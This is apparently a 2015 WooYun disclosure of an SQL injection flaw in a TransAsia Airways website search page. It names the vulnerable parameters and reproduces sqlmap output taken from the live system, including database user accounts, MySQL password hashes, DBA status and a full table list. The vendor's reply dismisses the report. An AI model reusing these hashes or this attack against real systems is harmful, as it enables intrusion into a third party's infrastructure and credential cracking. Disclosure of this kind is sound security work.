当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0156082

漏洞标题:台湾复兴航空某处存在SQL注射漏洞(臺灣地區)

相关厂商:复兴航空

漏洞作者: 路人甲

提交时间:2015-11-26 17:03

修复时间:2015-12-01 05:28

公开时间:2015-12-01 05:28

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:已交由第三方合作机构(Hitcon台湾互联网漏洞报告平台)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-11-26: 细节已通知厂商并且等待厂商处理中
2015-12-01: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

台湾复兴航空某处存在SQL注射漏洞(涉及库表、DBA权限)

详细说明:

https://**.**.**.**//tw/news-tw?keyword=1&search_month=all&search_year=all&start=1


1.png

漏洞证明:

database management system users [8]:
[*] 'debian-sys-maint'@'localhost'
[*] 'root'@'**.**.**.**'
[*] 'root'@'::1'
[*] 'root'@'ibecns'
[*] 'root'@'localhost'
[*] 'sa'@'%'
[*] 'sa'@'localhost'
[*] 'tnauser'@'%'
current user:    'sa@%'
current user is DBA:    True
database management system users password hashes:
[*] debian-sys-maint [1]:
    password hash: *A56F66C72EEC93F4CE6D7CBA5C29E83E94D275A5
[*] root [3]:
    password hash: *42063FFB63C7E3207A43CCBC8677678E294A53B0
    password hash: *A56F66C72EEC93F4CE6D7CBA5C29E83E94D275A5
    password hash: *FCAE28AF88BD57C48A830FE7AD6CCD80F2250FF9
[*] sa [2]:
    password hash: *9F982C4871098FA9AC8D0293E08844E2AA7F0CA3
    password hash: *FCAE28AF88BD57C48A830FE7AD6CCD80F2250FF9
[*] tnauser [1]:
password hash: *FCAE28AF88BD57C48A830FE7AD6CCD80F2250FF9
available databases [5]:
[*] information_schema
[*] mysql
[*] performance_schema
[*] tna_joomair
[*] tna_joomair_20151027
current database:    'tna_joomair'
Database: tna_joomair
[105 tables]
+-----------------------------------+
| tnadb_admintools_acl              |
| tnadb_admintools_adminiplist      |
| tnadb_admintools_badwords         |
| tnadb_admintools_cookies          |
| tnadb_admintools_customperms      |
| tnadb_admintools_filescache       |
| tnadb_admintools_ipautoban        |
| tnadb_admintools_ipautobanhistory |
| tnadb_admintools_ipblock          |
| tnadb_admintools_log              |
| tnadb_admintools_profiles         |
| tnadb_admintools_redirects        |
| tnadb_admintools_scanalerts       |
| tnadb_admintools_scans            |
| tnadb_admintools_storage          |
| tnadb_admintools_wafblacklists    |
| tnadb_admintools_wafexceptions    |
| tnadb_admintools_waftemplates     |
| tnadb_ak_profiles                 |
| tnadb_ak_stats                    |
| tnadb_ak_storage                  |
| tnadb_akeeba_common               |
| tnadb_assets                      |
| tnadb_associations                |
| tnadb_banner_clients              |
| tnadb_banner_tracks               |
| tnadb_banners                     |
| tnadb_betterpreview_sefs          |
| tnadb_categories                  |
| tnadb_chameleon_rule              |
| tnadb_chronoengine_extensions     |
| tnadb_contact_details             |
| tnadb_content                     |
| tnadb_content_frontpage           |
| tnadb_content_rating              |
| tnadb_content_types               |
| tnadb_contentitem_tag_map         |
| tnadb_core_log_searches           |
| tnadb_extensions                  |
| tnadb_finder_filters              |
| tnadb_finder_links                |
| tnadb_finder_links_terms0         |
| tnadb_finder_links_terms1         |
| tnadb_finder_links_terms2         |
| tnadb_finder_links_terms3         |
| tnadb_finder_links_terms4         |
| tnadb_finder_links_terms5         |
| tnadb_finder_links_terms6         |
| tnadb_finder_links_terms7         |
| tnadb_finder_links_terms8         |
| tnadb_finder_links_terms9         |
| tnadb_finder_links_termsa         |
| tnadb_finder_links_termsb         |
| tnadb_finder_links_termsc         |
| tnadb_finder_links_termsd         |
| tnadb_finder_links_termse         |
| tnadb_finder_links_termsf         |
| tnadb_finder_taxonomy             |
| tnadb_finder_taxonomy_map         |
| tnadb_finder_terms                |
| tnadb_finder_terms_common         |
| tnadb_finder_tokens               |
| tnadb_finder_tokens_aggregate     |
| tnadb_finder_types                |
| tnadb_jbackend_keys               |
| tnadb_jbackend_logs               |
| tnadb_languages                   |
| tnadb_menu                        |
| tnadb_menu_types                  |
| tnadb_messages                    |
| tnadb_messages_cfg                |
| tnadb_modules                     |
| tnadb_modules_menu                |
| tnadb_newsfeeds                   |
| tnadb_oneclickaction_actions      |
| tnadb_overrider                   |
| tnadb_postinstall_messages        |
| tnadb_purge_schedule              |
| tnadb_redirect_links              |
| tnadb_schemas                     |
| tnadb_session                     |
| tnadb_sh404sef_aliases            |
| tnadb_sh404sef_metas              |
| tnadb_sh404sef_pageids            |
| tnadb_sh404sef_urls               |
| tnadb_shlib_consumers             |
| tnadb_shlib_resources             |
| tnadb_tags                        |
| tnadb_template_styles             |
| tnadb_ucm_base                    |
| tnadb_ucm_content                 |
| tnadb_ucm_history                 |
| tnadb_update_sites                |
| tnadb_update_sites_extensions     |
| tnadb_updates                     |
| tnadb_user_keys                   |
| tnadb_user_notes                  |
| tnadb_user_profiles               |
| tnadb_user_usergroup_map          |
| tnadb_usergroups                  |
| tnadb_users                       |
| tnadb_viewlevels                  |
| tnadb_wf_profiles                 |
| tnadb_xmap_items                  |
| tnadb_xmap_sitemap                |
+-----------------------------------+

修复方案:

过滤。。

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-12-01 05:28

厂商回复:

使用sqlmap並無法得到相同結果
且通報者無回應

最新状态:

暂无